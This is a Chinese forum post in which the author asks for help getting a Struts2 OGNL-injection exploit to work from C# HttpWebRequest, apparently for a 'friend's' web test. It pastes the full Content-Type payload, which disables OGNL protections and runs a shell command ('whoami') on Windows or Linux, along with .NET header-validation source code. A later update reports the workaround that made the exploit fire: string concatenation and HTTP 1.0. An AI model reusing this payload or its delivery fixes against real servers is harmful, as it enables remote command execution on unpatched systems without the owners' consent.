极客观点
项目管理
HarmonyOS
各位大佬好--!
应朋友要求,帮他测试一个web漏洞。
本来以为很简单的一个HTTP GET,写完跑起来之后,发现无论如何都达不到想要的效果
HttpWebRequest
url =xxx,
method =get,
content-type="%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new (here is new line) java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}",
KeepAlive =false,
OverTime = 8000 (ms)
跑起来之后发现给header.content-type赋值的时候报错CRLF,问题出自字符串中“P=new Java”这里的空格和换行
查看堆栈到官方看从元数据发现有个限制就是串里面不能出现空格或者换行:https://referencesource.micro...
internal static string CheckBadChars(string name, bool isHeaderValue) {
if (name == null || name.Length == 0) {
// emtpy name is invlaid
if (!isHeaderValue) {
throw name == null ? new ArgumentNullException("name") :
new ArgumentException(SR.GetString(SR.net_emptystringcall, "name"), "name");
}
//empty value is OK
return string.Empty;
}
if (isHeaderValue) {
// VALUE check
//Trim spaces from both ends
name = name.Trim(HttpTrimCharacters);
//First, check for correctly formed multi-line value
//Second, check for absenece of CTL characters
int crlf = 0;
for(int i = 0; i < name.Length; ++i) {
char c = (char) (0x000000ff & (uint) name[i]);
switch (crlf)
{
case 0:
if (c == '\r')
{
crlf = 1;
}
else if (c == '\n')
{
// Technically this is bad HTTP. But it would be a breaking change to throw here.
// Is there an exploit?
crlf = 2;
}
else if (c == 127 || (c < ' ' && c != '\t'))
{
throw new ArgumentException(SR.GetString(SR.net_WebHeaderInvalidControlChars), "value");
}
break;
case 1:
if (c == '\n')
{
crlf = 2;
break;
}
throw new ArgumentException(SR.GetString(SR.net_WebHeaderInvalidCRLFChars), "value");
case 2:
if (c == ' ' || c == '\t')
{
crlf = 0;
break;
}
throw new ArgumentException(SR.GetString(SR.net_WebHeaderInvalidCRLFChars), "value");
}
}
if (crlf != 0)
{
throw new ArgumentException(SR.GetString(SR.net_WebHeaderInvalidCRLFChars), "value");
}
}
else {
// NAME check
//First, check for absence of separators and spaces
if (name.IndexOfAny(ValidationHelper.InvalidParamChars) != -1) {
throw new ArgumentException(SR.GetString(SR.net_WebHeaderInvalidHeaderChars), "name");
}
//Second, check for non CTL ASCII-7 characters (32-126)
if (ContainsNonAsciiChars(name)) {
throw new ArgumentException(SR.GetString(SR.net_WebHeaderInvalidNonAsciiChars), "name");
}
}
return name;
}
求助各位大佬,因为朋友用Python和java都已实现一样的GET--!
试过以下方法
rn 报错CRLF
字符串拼接 不生效
u0008 报错CRLF
\n 不生效
麻烦各位帮帮忙,给点建议或者意见,万分感谢。
能不能不要沉--!
==================04-16====================
问题已经搞定了。
从元数据里面看 应该是会去检索rn 但是不知道为什么我用拼接的字符就完全没有问题。
如下:
[code=csharp]payload += "(#p=new java.lang.ProcessBuilder(#cmds)).";[/code]
空格在这里完全不报错,奇了怪--!。
之后遇到了第二个问题,加上这个content-type还是会报错无法从链接中读取数据,链接已关闭。
还是从从元数据里面看了老半天,没用,改了HTTP的版本成10后 完美解决。。。